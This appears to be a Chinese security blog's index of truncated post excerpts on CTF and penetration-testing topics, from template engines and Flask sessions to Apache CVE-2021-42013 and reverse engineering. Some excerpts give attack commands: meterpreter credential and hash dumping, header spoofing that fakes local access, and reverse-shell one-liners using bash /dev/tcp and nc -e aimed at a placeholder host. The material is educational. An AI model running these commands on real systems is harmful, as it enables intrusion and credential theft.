Twig 引擎Twig 是一个 PHP 模版引擎 语法特征插值Twig 使用 {{}} 表示插值，用于输出变量或表达式的值 可以使用 . 或 [] 访问变量中的属性 12{{user.name}}{{user[&#...

抓取用户密码MSF 抓取自动登陆的用户名和密码在 meterpreter 中执行 1run windows/gather/credentials/windows_autologin MSF 导出密码哈希在 meterpreter 中执行以下命令 1run hashdump 1run windows/gathe...

Metasploit 模块辅助模块 Auxiliary Kali 路径：/usr/share/metasploit-framework/modules/auxiliary Mac 路径：/opt/metasploit-framework...

flask 的 session 格式flask 的 session 格式一般是由下面三个部分组成 1base64 加密的 session 数据（json、zlib 压缩处理的字符串） . 时间戳 . 签名 时间戳：用来告诉服务端数据最后一次更新的时间 签名：是利用 Hmac 算法，将 session 数据和...

ApacheApache HTTP 2.4.50 路径穿越漏洞 漏洞编号：CVE-2021-42013 影响范围：2.4.49 - 2.4.50 漏洞描述：由 CVE-2021-41773 的不完整修复导致的漏洞，攻击者可以使用路径遍历攻击将URL映射到由类似别名指令配置的目录之外的文件 漏洞扫描使用 nucl...

Javascript 原型链 JavaScript 常被描述为一种基于原型的语言 (prototype-based language)——每个对象拥有一个原型对象，对象以其原型为模板、从原型继承方法和属性。原型对象也可能拥有原型，并从中继承方法和属性，一层一层、以此类推。这种关系常被称为原型链 (prototyp...

本地访问 XFF 头12345678910111213141516171819202122232425X-Forwarded-For: 127.0.0.1X-Forwarded: 127.0.0.1Forwarded-For:127.0.0.1Forwarded: 127.0.0.1X-Requested-Wit...

开启监听123nc -lvvp 9999# or nc -lvvnp 9999 bash1bash -i >& /dev/tcp/ip/port 0>&1 nc1nc -e /bin/sh ip port 如果 nc 没有 -e 选项的话 1rm /tmp/f;mkfifo /t...

逆向中常见的加密算法base 系列base64 编码过程 如上图所示： 将字符串转换成二进制序列 按每 6 个二进制位为一组，分成若干组 如果不足 6 位，则最低位补 0 每 6 位组成一个新的字节，高位补 00，构成一个新的二进制序列 根据 base64 索引表中的值找到对应的字符 凑齐 4 字节整数倍，...

pyinstxtractor 解包 exe 文件1python pyinstxtractor.py pyexe.exe pyc 文件反编译pyc 文件格式可以通过 010Editor 打开 pyc 文件查看，pyc 文件的格式为： 4 个字节的 magic number （小端形式） 12个字节的源代码文件信...